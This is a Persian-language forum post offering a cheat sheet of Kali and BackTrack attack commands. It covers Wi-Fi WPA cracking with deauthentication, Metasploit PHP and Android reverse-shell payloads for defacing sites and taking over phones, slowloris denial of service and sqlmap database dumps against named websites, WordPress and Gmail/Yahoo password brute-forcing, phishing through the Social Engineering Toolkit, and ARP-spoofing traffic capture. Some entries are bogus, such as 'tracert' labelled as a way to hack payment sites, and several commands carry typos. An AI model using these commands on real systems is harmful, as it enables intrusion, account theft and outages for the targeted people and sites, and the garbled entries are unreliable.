ارسال پاسخ
spectrum




ارسال‌ها : 150
عضویت: 2015-05-21 08:03:25
محل زندگی:
سن: 1393
شناسه یاهو: ندارد
تعداد اخطار: 0
تشکرها : 3
تشکر شده : 0
کد های کالی و بک ترک وcmd-بخش 1

 

________________________________________________________________________________
reaver -i mon0 -b F8:E9:03:F8:17:12 -vv
_________________________________________________wifi hack in kali
airmon-ng
airmon-ng stop wlan0
airodump-ng wlan0
airodump-ng -c 11 --write tutorial --bssid F8:E9:03:F8:17:12 wlan0
when WPA handshake show
Eg:
aireplay-ng --deauth 5 -a F8:E9:03:F8:17:12 -c 98:D6:F7:91:68:45 wlan0
aireplay-ng --deauth 5 -a F8:E9:03:F8:17:12 -c C8:14:79:12:E7:71 wlan0
aireplay-ng --deauth 5 -a F8:E9:03:F8:17:12 -c 54:72:4F:C1:49:21 wlan0
aireplay-ng --deauth 5 -a F8:E9:03:F8:17:12 -c 48:5A:3F:2B:A4:E9 wlan0
aireplay-ng --deauth 5 -a F8:E9:03:F8:17:12 -c C4:9A:02:0D:76:8A wlan0
aircrack-ng -w
ls
aircrack-ng -w wordlist.txt -b F8:E9:03:F8:17:12 tutorial-01.cap

*make wordlist*
./crunch 4 14 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt


_____________________________________________________hack web_________________________

msfpayload php/meterpreter/reverse -tcp LHOST=192.168.17.143 LPORT=4444 R>/root/payload.php
msfconsole
use exploit/multi/handler
set payload php/meterpeter/reverse_tcp
set LHOST 192.168.17.143
set LPORT 4444
exploit -z -j
sessions
sessions -i 1
rm index.html
upload /root/deface.html.
rm /root/deface.html
rm deface.html
================================================================HACK web
cd Desktop/
perl ./slowlaris.pl -dns www.greektravel.com
================================================================HACK web
Open Backtrack/information Gathering/Database Analysis/Mssql Analysis/Sqlmap
./sqlmap.py -u annonces212.com/details_annonce.php?id=473 --dbs
1min wait
1 Question
NO
+inf.
+solufirm 212
+test
./sqlmap.py -u annonces212.com/details_annonce.php?id=473 -D solufirm 212 --tables
./sqlmap.py -u annonces212.com/details_annonce.php?id=473 -T admin --columns
./sqlmap.py -u annonces212.com/details_annonce.php?id=473 -T admin -L password --dump
copy & Paste Email please!
IN HERE****


search admin inurl:http://annonces212.com

http://annonces212.com/admin.php
INSERT****
==================================Hack word press===========================
Open wpscan from pentest
select target :www.backtracktutorial.com
www.backtracktutorial.com/wp-admin
./wpscan.rb --url www.backtracktutorial.com --enumerate u
we found username
Eg tejash1991
now brute force attack on those
yek serie password az ghable sakhteh shode copy va dar dakhel file wpscan migozarem
Password sazie:
./crunch 4 14 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o password.txt
./wpscan.rb --url www.backtracktutorial.com --wordlist password --username tejash1991
_____________________________________________________________________________________Start login
Backtracks
user:root
pass:root

Bugtraq
user:bugtraq
pass:123456
__________________________________________________________________HACK EMAIL___________________________________

social engineering toolkit/set first
1
2
3
1
ifconfig
int address
paste from 1
2
ENTER
get
user
Pass
_________________________________________________________________________________________Hack any Email By hydra
hydra -s -l  5@gmail.com -P wordlist.txt -e ns -V -s 465 smtp.gmail.com smtp

hydra -s -l  5@yahoo.com -P wordlist.txt -e ns -V -s 587 smtp.mail.yahoo smtp


or
hydra smtp.gmail.com smtp -l  5@gmail.com -P wordlist.txt -s port -S -v -V

 

___________________________________________________________________Hack IP____________

ip spoofing
cat /proc/sys/net/ipv4/ip_forward
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
ifconfig
sudo arpspoof -i eth1 192.168.0.107 192.168.0.1
sudo arpspoof -i eth1 192.168.0.107 -t 192.168.0.1
sudo arpspoof -i eth1 192.168.0.1 192.168.0.107
sudo driftnet -i eth1
sudo urlsnart -i eth1
________________________________________________________________ANY Email Hacking
social engineering toolkit/set first
1
1(spear-phishing Attack vectors
99
6(web jacking attack metohd
2
ifconfig
int address or any ip
paste from 1
enter Url
get
user
Pass
========================================================================change IP2========
ifconfig
int address
_______________________________________________________________________________________________Hack web in CMD
1=chose 1st website
2-open CMD
3-ping www.thewebsite.com
4-ping -t -l 1000 www.thewebsite.com
5-L=l
6-wait several hours
_________________________________________________________________________________________________Hack *Android* in kali

msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
ifconfig
set LHOST "inet address:ifconfig"
set LPORT 4444
exploit
SUMMRY:make an apk & force targrt to use this
msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.5 lport=443 R >/root/desktop/sachu.apk

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.5
set lport 443
exploit
send android apk to the target
and wait for install apk to this

__________________________________________________________________________________________ DDos ATTACKE
DDos ATTACKE
DDos ATTACKE
chmod +x slowloris.pl
prel ./slowloris.pl -dns www.46.lxb.ir port 80 timeout 1 -num 1000 -cache
____________________________________________________________________________________________________________________________Hack any payment web in CMD:
Hack any payment web in CMD:
tracert www.the web page.com
____________________________________________________________________________________________________________________________change Ip address in win CMD

portocl 4 disable
ipconfig /all
netsh int ip set address "your network connections name" static 192.168.0.100 255.255.0.0 192.168.0.1
Eg:

VMware Network Adapter VMnet1
netsh int ip set address "VMware Network Adapter VMnet1" static 192.168.0.100 255.255.0.0 192.168.0.1
________________________________________________________________________________________________________________________________

 

 

 

 

 

 

 

 

 

 

 


امضای کاربر :
1395/1/21
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
ارسال پاسخ
پرش به انجمن :